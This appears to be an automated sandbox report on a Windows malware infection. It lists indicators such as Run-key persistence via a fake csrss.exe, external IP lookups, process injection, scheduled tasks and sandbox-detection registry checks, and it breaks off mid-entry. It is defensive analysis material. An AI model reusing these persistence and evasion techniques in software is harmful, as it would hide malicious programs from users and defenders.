mNDcgp0zrWGy_iR_gqWvo4tt.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce FnPK_uULTBfwZezEEGCXaVE6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" FnPK_uULTBfwZezEEGCXaVE6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ipinfo.io 121 checkip.amazonaws.com 130 ipinfo.io 190 api.2ip.ua 252 ip-api.com 275 api.2ip.ua 14 ipinfo.io 131 api.2ip.ua 329 checkip.amazonaws.com 132 api.2ip.ua 174 ipinfo.io 184 api.2ip.ua 283 api.2ip.ua 129 ipinfo.io -
Drops file in System32 directory 6 IoCs
Processes:
SVjvbHJ.exeInstall.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini SVjvbHJ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SVjvbHJ.exe -
Suspicious use of SetThreadContext 19 IoCs
Processes:
faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exekdnmdIr2m3Z75rmoxMQY45zR.exe_az72zCJh0iBWr5dTACKXrws.exeM52CB.exe0BB4J.exekdnmdIr2m3Z75rmoxMQY45zR.exekdnmdIr2m3Z75rmoxMQY45zR.exesd1gX57A0wItT05S8cNnJS6P.exebuild2.exeSETUP_~2.EXE4A1B.exe4A1B.exebuild2.exeCE07.exe3A8A.exeF576.exeDllHelper.exeTal.exe.pifTal.exe.pifdescription pid process target process PID 3620 set thread context of 4196 3620 faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe PID 3964 set thread context of 4552 3964 kdnmdIr2m3Z75rmoxMQY45zR.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 3232 set thread context of 3840 3232 _az72zCJh0iBWr5dTACKXrws.exe _az72zCJh0iBWr5dTACKXrws.exe PID 2616 set thread context of 4688 2616 M52CB.exe RunDll32.exe PID 3784 set thread context of 4204 3784 0BB4J.exe 0BB4J.exe PID 4324 set thread context of 5224 4324 kdnmdIr2m3Z75rmoxMQY45zR.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 5584 set thread context of 5716 5584 kdnmdIr2m3Z75rmoxMQY45zR.exe kdnmdIr2m3Z75rmoxMQY45zR.exe PID 3704 set thread context of 3516 3704 sd1gX57A0wItT05S8cNnJS6P.exe sd1gX57A0wItT05S8cNnJS6P.exe PID 4116 set thread context of 5624 4116 build2.exe build2.exe PID 4960 set thread context of 5984 4960 SETUP_~2.EXE InstallUtil.exe PID 1260 set thread context of 5340 1260 4A1B.exe 4A1B.exe PID 3880 set thread context of 6076 3880 4A1B.exe 4A1B.exe PID 4980 set thread context of 3760 4980 build2.exe build2.exe PID 4944 set thread context of 4344 4944 CE07.exe vbc.exe PID 4452 set thread context of 3972 4452 3A8A.exe 3A8A.exe PID 4904 set thread context of 109088 4904 F576.exe AppLaunch.exe PID 3180 set thread context of 1180 3180 DllHelper.exe InstallUtil.exe PID 109144 set thread context of 5356 109144 Tal.exe.pif Tal.exe.pif PID 109296 set thread context of 1164 109296 Tal.exe.pif Tal.exe.pif -
Drops file in Program Files directory 2 IoCs
Processes:
1hObAWF58hoo9_jA8jPWtwDx.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hObAWF58hoo9_jA8jPWtwDx.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hObAWF58hoo9_jA8jPWtwDx.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeH4qQ5eq5WgfPy9pgenBRiiaH.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job schtasks.exe File opened for modification C:\Windows\rss H4qQ5eq5WgfPy9pgenBRiiaH.exe File created C:\Windows\rss\csrss.exe H4qQ5eq5WgfPy9pgenBRiiaH.exe File created C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5780 sc.exe -
Detects Pyinstaller 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller C:\Users\Admin\Pictures\Adobe Films\jtfXiAYn71DsfeALHUTabEl4.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2332 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 3832 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 2380 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 2156 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 4324 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5156 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5316 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 5440 2284 WerFault.exe l2S7FrWODIlvtiOh9PM4XNlS.exe 5732 1216 WerFault.exe Kog456fPoi_qlj0gOuQ1ue72.exe 6016 1744 WerFault.exe wd1PHHYFXTO2GwSbYNeKiEhd.exe 4624 3244 WerFault.exe FzbLA0y21wf4Eb_GXZGPAkPK.exe 876 5800 WerFault.exe 50543188494393494002.exe 4292 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 6044 5436 WerFault.exe tmRoymsFOt7qgiIyaQJKTG0D.exe 1044 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 4436 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 2596 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 5116 5512 WerFault.exe rundll32.exe 3240 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 6112 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 5348 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 3224 3608 WerFault.exe Ju38t3w5U8IOhBMX5rcSC6Nn.exe 452 2476 WerFault.exe explorer.exe 4332 2448 WerFault.exe explorer.exe 5288 4404 WerFault.exe 987E.exe 65324 24408 WerFault.exe FB35.exe 6220 804 WerFault.exe bguuwe.exe 6312 1164 WerFault.exe Tal.exe.pif 7512 7472 WerFault.exe bguuwe.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Itvrzxmax2.exe6DF1.exe8AF1.exeTUsKZ9i3PovwwAgsSaLpghkJ.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Itvrzxmax2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Itvrzxmax2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6DF1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8AF1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8AF1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TUsKZ9i3PovwwAgsSaLpghkJ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TUsKZ9i3PovwwAgsSaLpghkJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Itvrzxmax2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6DF1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6DF1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8AF1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI TUsKZ9i3PovwwAgsSaLpghkJ.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
l2S7FrWODIlvtiOh9PM4XNlS.exeFzbLA0y21wf4Eb_GXZGPAkPK.exebuild2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString l2S7FrWODIlvtiOh9PM4XNlS.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FzbLA0y21wf4Eb_GXZGPAkPK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FzbLA0y21wf4Eb_GXZGPAkPK.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 l2S7FrWODIlvtiOh9PM4XNlS.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5768 schtasks.exe 1524 schtasks.exe 3112 schtasks.exe 4700 schtasks.exe 5364 schtasks.exe 5940 schtasks.exe 1712 schtasks.exe 4212 schtasks.exe 3144 schtasks.exe 5580 schtasks.exe 6712 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6052 timeout.exe 3196 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5084 tasklist.exe 109220 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5628 taskkill.exe 5268 taskkill.exe 6060 taskkill.exe 2176 taskkill.exe -
Processes:
3A2F1MAI23B9J52.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch 3A2F1MAI23B9J52.exe Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" 3A2F1MAI23B9J52.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync 3A2F1MAI23B9J52.exe Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" 3A2F1MAI23B9J52.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser -
Modifies data under HKEY_USERS 64 IoCs
Processes:
H4qQ5eq5WgfPy9pgenBRiiaH.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" H4qQ5eq5WgfPy9pgenBRiiaH.exe -
Modifies registry class 64 IoCs
Processes:
description ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" Set value (int) 